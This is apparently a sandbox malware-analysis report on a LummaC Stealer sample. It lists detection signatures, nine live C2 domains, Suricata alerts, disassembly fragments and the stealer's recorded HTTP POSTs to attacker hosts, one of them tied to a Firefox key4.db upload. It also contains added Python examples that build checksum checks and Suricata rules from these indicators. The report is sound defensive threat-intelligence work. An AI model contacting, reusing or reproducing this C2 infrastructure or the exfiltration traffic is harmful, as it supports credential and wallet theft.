
Windows Analysis Report
Setupv.exe

Overview

General Information

Sample name: Setupv.exe
Analysis ID: 1676533
MD5: a88651093c94d9006da8ccbc80535e29
SHA1: 31208c84dd3066d4d0449c588e1614485156845e
SHA256: fc9adba0c5b7ac7700a7e904aecfffb41a53c9311f249dcbf5678707d10db7ea
Tags: exe, lumma, lummac, lummastealer, stealer, user-LuRisa798

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal from password manager
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
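One of the signatures above, "PE file contains an invalid checksum", rests on a single field: OptionalHeader.CheckSum. As an added example (not code from the report or from Joe Security), the following Python recomputes that checksum with the imagehlp algorithm and classifies the stored value as valid, unset or invalid. The 312-byte PE32 header skeleton it builds is constructed test input, not the analysed sample, and the 4-byte alignment of the CheckSum field is assumed (the loader requires it for real images).

```python
"""Added example (not from the Joe Sandbox report): recompute a PE image
checksum the way imagehlp CheckSumMappedFile does and compare it with the
value stored in the optional header. A mismatch is what the report's
"PE file contains an invalid checksum" signature means; a stored 0 only says
the linker never set one, which is common for user-mode binaries, so it is
weak evidence on its own."""
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def checksum_field_offset(data):
    """File offset of OptionalHeader.CheckSum; raises ValueError if the headers
    are not a PE image. The field sits at offset 64 of the optional header for
    both PE32 and PE32+."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    opt_hdr = e_lfanew + 4 + 20          # PE signature + COFF file header
    magic = struct.unpack_from("<H", data, opt_hdr)[0]
    if magic not in (PE32_MAGIC, PE32PLUS_MAGIC):
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return opt_hdr + 64


def compute_pe_checksum(data):
    """One's-complement style sum of all 32-bit little-endian words with
    end-around carry, skipping the CheckSum field itself, folded to 16 bits and
    added to the file length. Assumes the CheckSum field is 4-byte aligned."""
    skip = checksum_field_offset(data)
    total = 0
    full = len(data) - len(data) % 4
    for off in range(0, full, 4):
        if off == skip:
            continue
        total += struct.unpack_from("<I", data, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    if len(data) % 4:                      # trailing partial word, if any
        total += int.from_bytes(data[full:], "little")
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF


def verify_pe_checksum(data):
    """Return (stored, computed, verdict); verdict is 'valid', 'unset'
    (stored == 0) or 'invalid'."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = compute_pe_checksum(data)
    if stored == 0:
        verdict = "unset"
    elif stored == computed:
        verdict = "valid"
    else:
        verdict = "invalid"
    return stored, computed, verdict


def build_minimal_pe(checksum):
    """Constructed 312-byte PE32 header skeleton (no sections) used as offline
    test input; it is not the sample analysed in the report."""
    dos = b"MZ" + bytes(58) + struct.pack("<I", 0x40)            # e_lfanew = 0x40
    coff = b"PE\x00\x00" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x0102)
    opt = bytearray(224)                                         # PE32 optional header
    struct.pack_into("<H", opt, 0, PE32_MAGIC)
    struct.pack_into("<I", opt, 64, checksum)
    return dos + coff + bytes(opt)


if __name__ == "__main__":
    unset = build_minimal_pe(0)
    good = build_minimal_pe(compute_pe_checksum(unset))
    for name, image in (("unset", unset), ("good", good), ("tampered", build_minimal_pe(0x1234))):
        print(name, verify_pe_checksum(image))
```

Run it against a real file by reading it with `open(path, "rb").read()` and passing the bytes to `verify_pe_checksum`; an "unset" verdict should not be weighted like an "invalid" one, since only drivers and signed system binaries are routinely expected to carry a correct checksum.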

Classification

Classification legend: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious
  • System is w10x64
  • Setupv.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\Setupv.exe" MD5: A88651093C94D9006DA8CCBC80535E29)
  • cleanup
{
  "C2 url": [
    "transdataa.digital/xwpa",
    "geographys.run/eirq",
    "woodpeckersd.run/glsk",
    "tropiscbs.live/iuwxx",
    "cartograhphy.top/ixau",
    "biosphxere.digital/tqoa",
    "topographky.top/xlak",
    "climatologfy.top/kbud",
    "vigorbridgoe.top/banb"
  ],
  "Build id": "9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c"
}
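The extracted configuration above lists nine C2 URLs and a build id. As an added example (not part of the Joe Sandbox report or of any vendor tooling), the following Python normalizes that configuration into IOCs, generates a Suricata DNS rule per C2 domain in the spirit of the ET alerts recorded for this run, and checks constructed DNS/HTTP log lines (modelled on this report's traffic, not a real capture) against them. It also reports hosts that were contacted but are absent from the configuration; for this run that includes toptalentw.top, the host that receives the multipart POSTs, and steamcommunity.com. The log line format, the local-range SIDs and the rule text are assumptions of the example.

```python
"""Added example, not part of the Joe Sandbox report or of any vendor tool:
normalize the extracted LummaC configuration into IOCs, generate Suricata DNS
rules for the C2 domains, and check log lines against them."""
import json
import re
from urllib.parse import urlsplit

# The configuration exactly as the report's Malware Configuration Extractor printed it.
LUMMA_CONFIG = """{
  "C2 url": [
    "transdataa.digital/xwpa", "geographys.run/eirq", "woodpeckersd.run/glsk",
    "tropiscbs.live/iuwxx", "cartograhphy.top/ixau", "biosphxere.digital/tqoa",
    "topographky.top/xlak", "climatologfy.top/kbud", "vigorbridgoe.top/banb"
  ],
  "Build id": "9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c"
}"""

# Constructed log lines modelled on this report's DNS queries and HTTP requests
# (not a real capture). Assumed format: "<timestamp> <DNS|HTTP> <host> [<method> <path>]".
SAMPLE_LOG = """\
2025-04-28T19:34:48 DNS transdataa.digital
2025-04-28T19:34:49 HTTP transdataa.digital POST /xwpa
2025-04-28T19:34:49 DNS tropiscbs.live
2025-04-28T19:34:50 DNS steamcommunity.com
2025-04-28T19:34:51 HTTP steamcommunity.com GET /profiles/76561199845513035
2025-04-28T19:34:52 DNS toptalentw.top
2025-04-28T19:34:52 HTTP toptalentw.top POST /qena
2025-04-28T19:34:55 DNS www.microsoft.com
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<proto>DNS|HTTP)\s+(?P<host>\S+)"
    r"(?:\s+(?P<method>\S+)\s+(?P<path>\S+))?$"
)


def config_iocs(config_text):
    """Parse a LummaC config blob into {'build_id', 'domains', 'urls'}.
    The C2 entries carry no scheme, so one is prepended only so that urlsplit
    can separate host from path; 'urls' keeps the entries as written."""
    cfg = json.loads(config_text)
    domains, urls = set(), set()
    for entry in cfg["C2 url"]:
        entry = entry.strip()
        host = urlsplit("https://" + entry).hostname
        if host:
            domains.add(host.lower())
            urls.add(entry)
    return {"build_id": cfg["Build id"], "domains": domains, "urls": urls}


def defang(indicator):
    """Defang for safe sharing: 'tropiscbs.live' -> 'tropiscbs[.]live'."""
    return indicator.replace("http", "hxxp").replace(".", "[.]")


def suricata_dns_rule(domain, sid):
    """Suricata rule (5.x+ syntax, dns.query sticky buffer) alerting on a lookup
    of the domain or of any name ending in it. The SID is a hypothetical
    local-range value, not an ET SID; classtype domain-c2 is from the ET set."""
    return (
        "alert dns $HOME_NET any -> any any ("
        f'msg:"LummaC CnC domain in DNS lookup ({defang(domain)})"; '
        f'dns.query; content:"{domain}"; nocase; endswith; '
        f"classtype:domain-c2; sid:{sid}; rev:1;)"
    )


def _is_c2(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def match_log(log_text, iocs):
    """Split log lines into hits (host is a config C2 domain or a subdomain of
    one) and the set of other hosts contacted. The second set matters for
    triage: in this report the host taking the multipart uploads,
    toptalentw.top, is absent from the extracted C2 list."""
    hits, other_hosts = [], set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        host = m["host"].lower()
        if _is_c2(host, iocs["domains"]):
            hits.append(line)
        else:
            other_hosts.add(host)
    return hits, other_hosts


if __name__ == "__main__":
    iocs = config_iocs(LUMMA_CONFIG)
    print("build id:", iocs["build_id"])
    for n, d in enumerate(sorted(iocs["domains"]), start=9000001):
        print(suricata_dns_rule(d, n))
    hits, others = match_log(SAMPLE_LOG, iocs)
    print("C2 hits:", len(hits), "| hosts outside config:", sorted(others))
```

The set of hosts outside the configuration is the triage lead: a blocklist derived only from the extracted C2 list would have missed toptalentw.top in this run, so baseline that set against known-good destinations and review what remains rather than alerting on it blindly.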
Yara matches (Source | Rule | Description | Author):
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Setupv.exe PID: 7840 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
        No Sigma rule has matched
Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2025-04-28T19:34:28.895163+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49695 | 172.67.182.68 | 443 | TCP
2025-04-28T19:34:51.062891+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49698 | 23.52.218.12 | 443 | TCP
2025-04-28T19:34:52.111729+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49699 | 104.21.36.133 | 443 | TCP
2025-04-28T19:34:55.245027+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49700 | 104.21.36.133 | 443 | TCP
2025-04-28T19:34:56.620929+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49701 | 104.21.36.133 | 443 | TCP
2025-04-28T19:34:59.244166+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49702 | 104.21.36.133 | 443 | TCP
2025-04-28T19:35:01.243642+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49703 | 104.21.36.133 | 443 | TCP
2025-04-28T19:35:04.153586+0200 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 104.21.36.133 | 443 | TCP
2025-04-28T19:34:49.494621+0200 | 2061849 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59328 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:49.338097+0200 | 2061851 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59381 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:50.084494+0200 | 2061807 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63921 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:48.826594+0200 | 2061853 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57728 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:49.655128+0200 | 2061857 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59371 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:49.176939+0200 | 2061859 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 60715 | 1.1.1.1 | 53 | UDP
2025-04-28T19:34:50.242689+0200 | 2061861 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 59576 | 1.1.1.1 | 53 | UDP


        AV Detection

Source: https://cartograhphy.top:443/ixauaD( | Avira URL Cloud: Label: malware
Source: https://cartograhphy.top/ixau3 | Avira URL Cloud: Label: malware
Source: https://biosphxere.digital/ | Avira URL Cloud: Label: malware
Source: https://geographys.run/m | Avira URL Cloud: Label: malware
Source: https://biosphxere.digital/tqoa | Avira URL Cloud: Label: malware
Source: https://woodpeckersd.run/glsk | Avira URL Cloud: Label: malware
Source: https://toptalentw.top:443/qenal | Avira URL Cloud: Label: malware
Source: https://topographky.top/l/ | Avira URL Cloud: Label: malware
Source: https://toptalentw.top/qena | Avira URL Cloud: Label: malware
Source: https://biosphxere.digital:443/tqoa | Avira URL Cloud: Label: malware
Source: https://vigorbridgoe.top/banb8 | Avira URL Cloud: Label: malware
Source: https://toptalentw.top:443/qenazchhhv.default-release/key4.dbPK | Avira URL Cloud: Label: malware
Source: https://topographky.top/f.ms1& | Avira URL Cloud: Label: malware
Source: transdataa.digital/xwpa | Avira URL Cloud: Label: malware
Source: https://topographky.top/xlakoam | Avira URL Cloud: Label: malware
Source: https://woodpeckersd.run/ | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/S | Avira URL Cloud: Label: malware
Source: https://transdataa.digital/ | Avira URL Cloud: Label: malware
Source: https://tropiscbs.live/iuwxx | Avira URL Cloud: Label: malware
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["transdataa.digital/xwpa", "geographys.run/eirq", "woodpeckersd.run/glsk", "tropiscbs.live/iuwxx", "cartograhphy.top/ixau", "biosphxere.digital/tqoa", "topographky.top/xlak", "climatologfy.top/kbud", "vigorbridgoe.top/banb"], "Build id": "9b3bedb653f936be48e5e9e5aff9524e4bcff3a9368fb60c"}
Source: Setupv.exe | ReversingLabs: Detection: 27%
Source: Setupv.exe | Virustotal: Detection: 27%
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: transdataa.digital/xwpa
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: geographys.run/eirq
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: woodpeckersd.run/glsk
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: tropiscbs.live/iuwxx
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: cartograhphy.top/ixau
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: biosphxere.digital/tqoa
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: topographky.top/xlak
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: climatologfy.top/kbud
Source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp | String decryptor: vigorbridgoe.top/banb
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2D060: CryptUnprotectData
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2CCE4: CryptUnprotectData
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2AD00: CryptUnprotectData
Source: Setupv.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: unknown | HTTPS traffic detected: 172.67.182.68:443 -> 192.168.2.5:49695 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.52.218.12:443 -> 192.168.2.5:49698 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49701 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49703 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.36.133:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E21B31: 4x nop then cmp dword ptr [edx+ecx*8], 2D5FAC64h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E220F8: 4x nop then mov esi, ecx
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5B8B0: 4x nop then cmp word ptr [edi+ebx], 0000h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1F805: 4x nop then xor eax, eax
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E3D910: 4x nop then movzx ecx, byte ptr [esp+eax+04h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E3D910: 4x nop then cmp dword ptr [edi+esi*8], 98E38976h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E3D910: 4x nop then lea esi, dword ptr [edx+ecx]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E3DE80: 4x nop then movzx ecx, byte ptr [esp+eax+20h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5CFE0: 4x nop then movzx ecx, byte ptr [esp+eax+78DB078Ah]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E21778: 4x nop then cmp dword ptr [esi+edx*8], 5A3C2B61h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2B4FD: 4x nop then mov word ptr [eax], dx
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5C4C0: 4x nop then cmp dword ptr [edi+edx*8], 460854CDh
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2EC24: 4x nop then movzx ecx, byte ptr [esp+eax-76h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2EC24: 4x nop then movzx ecx, byte ptr [esp+eax-00000086h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E32260: 4x nop then cmp word ptr [edi+eax+02h], 0000h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E523D0: 4x nop then movzx ecx, byte ptr [esp+eax+75442A6Ah]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E3AB96: 4x nop then movzx edi, byte ptr [ecx+eax-27F67330h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1CB70: 4x nop then movzx ecx, byte ptr [esp+eax+6F2F5F94h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1CB70: 4x nop then movzx ebx, byte ptr [eax+esi]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E55B70: 4x nop then movzx ebx, byte ptr [esp+ecx+04h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E36340: 4x nop then movzx ecx, byte ptr [esp+eax-54h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1B310: 4x nop then movsx eax, byte ptr [esi+ecx]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E300E0: 4x nop then movzx esi, byte ptr [esp+eax+1B95F13Eh]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E300E0: 4x nop then movzx ecx, word ptr [ebx+eax]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E300E0: 4x nop then movzx edi, byte ptr [esp+edx]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E300E0: 4x nop then movzx ebx, byte ptr [esp+eax]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E55080: 4x nop then movzx edi, byte ptr [esp+eax+75442A6Ah]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1A070: 4x nop then add eax, dword ptr [esp+ecx*4+24h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1A070: 4x nop then movzx ecx, word ptr [edi+esi*4]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E21016: 4x nop then jmp eax
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E599F0: 4x nop then movzx ecx, byte ptr [esp+eax+04h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5D180: 4x nop then movzx ecx, byte ptr [esp+eax+78DB078Ah]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E55160: 4x nop then movzx ecx, byte ptr [esp+eax-74A91344h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5C150: 4x nop then movzx esi, byte ptr [esp+eax]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5C150: 4x nop then movzx ecx, byte ptr [esp+eax+78DB0786h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5C150: 4x nop then movzx eax, word ptr [ecx]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E3DEA0: 4x nop then movzx ecx, byte ptr [esp+eax+7902EEFAh]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E51E90: 4x nop then push edi
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E34E50: 4x nop then movzx edx, byte ptr [esp+eax+0Ch]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E5BE50: 4x nop then cmp dword ptr [edx+ecx*8], 8DD87000h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2BE24: 4x nop then movzx edx, byte ptr [esi+eax-0000008Eh]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2C7EC: 4x nop then movzx edx, byte ptr [esi+eax-0000008Eh]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E44FC4: 4x nop then mov byte ptr [esi], cl
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E59FB0: 4x nop then movzx ecx, byte ptr [esp+eax-5EB489ACh]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E59FB0: 4x nop then cmp dword ptr [edx+ecx*8], 6D603FE4h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E59FB0: 4x nop then mov edi, ecx
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E40F90: 4x nop then movzx ecx, byte ptr [esp+eax+1Ch]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E40F90: 4x nop then movzx esi, byte ptr [esp+ecx-267DEF53h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E31F74: 4x nop then cmp word ptr [eax+ecx+02h], 0000h
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E31F74: 4x nop then movzx esi, byte ptr [esp+edx+08h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E29720: 4x nop then movsx ecx, byte ptr [esi+eax]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1D730: 4x nop then mov word ptr [edx], ax
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E20733: 4x nop then movzx edx, word ptr [eax]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E54F00: 4x nop then movzx esi, byte ptr [esp+eax+75442A6Ah]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2DCD0: 4x nop then mov dword ptr [esi+0Ch], ecx
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E2A4AA: 4x nop then mov word ptr [ecx], dx
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E184B0: 4x nop then mov ebp, eax
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E11C70: 4x nop then movzx ebx, byte ptr [esi+01h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E525E0: 4x nop then mov eax, dword ptr [esp+30h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E36DC0: 4x nop then movzx ebx, byte ptr [esp+ebp+02h]
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E1F548: 4x nop then mov esi, edx
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E31D23: 4x nop then mov word ptr [eax], di
Source: C:\Users\user\Desktop\Setupv.exe | Code function 0_3_02E3A52E: 4x nop then movzx edx, byte ptr [esp+ebx-1FD35320h]

        Networking

Source: Network traffic | Suricata IDS: 2061859 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tropiscbs .live) : 192.168.2.5:60715 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061857 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (topographky .top) : 192.168.2.5:59371 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061851 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cartograhphy .top) : 192.168.2.5:59381 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061849 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (biosphxere .digital) : 192.168.2.5:59328 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061861 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vigorbridgoe .top) : 192.168.2.5:59576 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061807 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (climatologfy .top) : 192.168.2.5:63921 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2061853 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (geographys .run) : 192.168.2.5:57728 -> 1.1.1.1:53
Source: Malware configuration extractor | URLs: transdataa.digital/xwpa
Source: Malware configuration extractor | URLs: geographys.run/eirq
Source: Malware configuration extractor | URLs: woodpeckersd.run/glsk
Source: Malware configuration extractor | URLs: tropiscbs.live/iuwxx
Source: Malware configuration extractor | URLs: cartograhphy.top/ixau
Source: Malware configuration extractor | URLs: biosphxere.digital/tqoa
Source: Malware configuration extractor | URLs: topographky.top/xlak
Source: Malware configuration extractor | URLs: climatologfy.top/kbud
Source: Malware configuration extractor | URLs: vigorbridgoe.top/banb
Source: global traffic | HTTP traffic detected: GET /profiles/76561199845513035 HTTP/1.1 | Connection: Keep-Alive | Host: steamcommunity.com
Source: Joe Sandbox View | IP Address: 23.52.218.12
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49695 -> 172.67.182.68:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49698 -> 23.52.218.12:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 104.21.36.133:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 104.21.36.133:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.36.133:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 104.21.36.133:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.36.133:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 104.21.36.133:443
Source: global traffic | HTTP traffic detected: POST /xwpa HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 57 | Host: transdataa.digital
Source: global traffic | HTTP traffic detected: POST /qena HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 | Content-Length: 57 | Host: toptalentw.top
